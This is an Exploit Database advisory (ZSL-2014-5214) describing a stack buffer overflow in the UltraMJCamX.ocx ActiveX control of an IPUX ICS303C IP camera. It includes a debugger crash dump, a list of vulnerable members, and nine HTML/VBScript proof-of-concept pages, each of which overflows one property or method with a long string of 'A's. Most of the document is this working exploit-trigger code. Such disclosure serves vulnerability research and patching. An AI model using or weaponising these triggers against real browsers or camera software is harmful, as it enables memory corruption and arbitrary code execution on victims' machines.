IPUX Cube Type CS303C IP Camera – ‘UltraMJCamX.ocx’ ActiveX Stack Buffer Overflow

• Exploit Database
• 15 阅读

• 作者： LiquidWorm
  日期： 2014-12-02
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/35420/

• 
  IPUX Cube Type CS303C IP Camera (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow
  
  
  Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
  Product web page: http://www.ipux.net | http://www.fitivision.com
  Affected version: Cube Type ICS303C (firmware: ICS303C 1.0.0-17 20140120 r1511)
  
  Summary: The device is Day and Night Cube Network camera with CMOS sensor. With
  Motion JPEG video compression, the file size of video stream is extremely reduced,
  as to optimize the network bandwidth efficiency. It has 3X digital zoom feature for
  a larger space monitoring. The ICS303C comes with a IR-cut filter and 4 built-in IR
  illuminators for both day and night applications.
  
  Desc: The UltraMJCam ActiveX Control 'UltraMJCamX.ocx' suffers from a stack buffer
  overflow vulnerability when parsing large amount of bytes to several functions in
  UltraMJCamLib, resulting in memory corruption overwriting several registers including
  the SEH. An attacker can gain access to the system of the affected node and execute
  arbitrary code.
  
  ----------------------------------------------------------------------------------
  
  (48d0.2e98): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraMJCamX.ocx - 
  eax=41414149 ebx=00000001 ecx=00002e98 edx=02636d5b esi=41414141 edi=02636d5b
  eip=7796466c esp=0038ebf4 ebp=0038ec28 iopl=0 nv up ei pl zr na pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010246
  ntdll!RtlDeleteCriticalSection+0x77:
  7796466c 833800cmp dword ptr [eax],0ds:002b:41414149=????????
  
  ----------------------------------------------------------------------------------
  
  
  Tested on: Microsoft Windows 7 Professional SP1 (EN)
  
  
  Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2014-5214
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5214.php
  
  
  16.11.2014
  
  ---
  
  
  Properties:
  -----------
  
  FileDescription		UltraMJCam ActiveX Control
  FileVersion		1, 0, 52, 23
  InternalName		UltraMJCamX
  OriginalFileName	UltraMJCamX.ocx
  ProductName		UltraMJCam device ActiveX Control
  ProductVersion		1, 0, 52, 23
  
  
  List of members:
  ----------------
  
  Interface IUltraMJCamX : IDispatch
  Default Interface: True
  Members : 65
  	RemoteHost
  	RemotePort
  	AccountCode
  	GetConfigValue
  	SetConfigValue
  	SetCGIAPNAME
  	Password
  	UserName
  	fChgImageSize
  	ImgWidth
  	ImgHeight
  	SnapFileName
  	AVIRecStart
  	SetImgScale
  	OpenFolder
  	OpenFileDlg
  	TriggerStatus
  	AVIRecStatus
  	Event_Frame
  	PlayVideo
  	SetAutoScale
  	Event_Signal
  	WavPlay
  	CGI_ParamGet
  	CGI_ParamSet
  	MulticastEnable
  	MulticastStatus
  	SetPTUserAllow
  	SetLanguage
  	TimestampEnable
  	TimestampStroke
  
  
  Vulnerable members of the class:
  --------------------------------
  
  RemoteHost
  AccountCode
  SetCGIAPNAME
  Password
  Username
  SnapFileName
  OpenFolder
  CGI_ParamGet
  CGI_ParamSet
  
  
  PoC(s):
  -------
  
  
  ---1
  
  
  <html>
  <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
  prototype= "Property Let RemoteHost As String"
  memberName = "RemoteHost"
  progid = "UltraMJCamLib.UltraMJCamX"
  argCount = 1
  arg1=String(1044, "A")
  target.RemoteHost = arg1
  </script>
  </html>
  
  
  ---2
  
  
  <html>
  <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
  prototype= "Property Let AccountCode As String"
  memberName = "AccountCode"
  progid = "UltraMJCamLib.UltraMJCamX"
  argCount = 1
  arg1=String(3092, "A")
  target.AccountCode = arg1
  </script>
  </html>
  
  
  ---3
  
  
  <html>
  <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
  prototype= "Property Let SetCGIAPNAME As String"
  memberName = "SetCGIAPNAME"
  progid = "UltraMJCamLib.UltraMJCamX"
  argCount = 1
  arg1=String(3092, "A")
  target.SetCGIAPNAME = arg1
  </script>
  </html>
  
  
  ---4
  
  
  <html>
  <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
  prototype= "Property Let Password As String"
  memberName = "Password"
  progid = "UltraMJCamLib.UltraMJCamX"
  argCount = 1
  arg1=String(2068, "A")
  target.Password = arg1
  </script>
  </html>
  
  
  ---5
  
  
  <html>
  <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
  prototype= "Property Let UserName As String"
  memberName = "UserName"
  progid = "UltraMJCamLib.UltraMJCamX"
  argCount = 1
  arg1=String(4116, "A")
  target.UserName = arg1
  </script>
  </html>
  
  
  ---6
  
  
  <html>
  <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
  prototype= "Property Let SnapFileName As String"
  memberName = "SnapFileName"
  progid = "UltraMJCamLib.UltraMJCamX"
  argCount = 1
  arg1=String(4116, "A")
  target.SnapFileName = arg1
  </script>
  </html>
  
  
  ---7
  
  
  <html>
  <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
  prototype= "Function OpenFolder ( ByVal sInitPath As String ) As String"
  memberName = "OpenFolder"
  progid = "UltraMJCamLib.UltraMJCamX"
  argCount = 1
  arg1=String(5140, "A")
  target.OpenFolder arg1 
  </script>
  </html>
  
  
  ---8
  
  
  <html>
  <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
  prototype= "Function CGI_ParamGet ( ByVal sGroup As String ,ByVal sName As String ) As String"
  memberName = "CGI_ParamGet"
  progid = "UltraMJCamLib.UltraMJCamX"
  argCount = 2
  arg1=String(4116, "A")
  arg2="defaultV"
  target.CGI_ParamGet arg1 ,arg2 
  </script>
  </html>
  
  
  ---9
  
  
  <html>
  <object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
  <script language='vbscript'>
  targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
  prototype= "Function CGI_ParamSet ( ByVal sGroup As String ,ByVal sName As String ,ByVal SVal As String ) As Long"
  memberName = "CGI_ParamSet"
  progid = "UltraMJCamLib.UltraMJCamX"
  argCount = 3
  arg1=String(10260, "A")
  arg2="defaultV"
  arg3="defaultV"
  target.CGI_ParamSet arg1 ,arg2 ,arg3 
  </script>
  </html>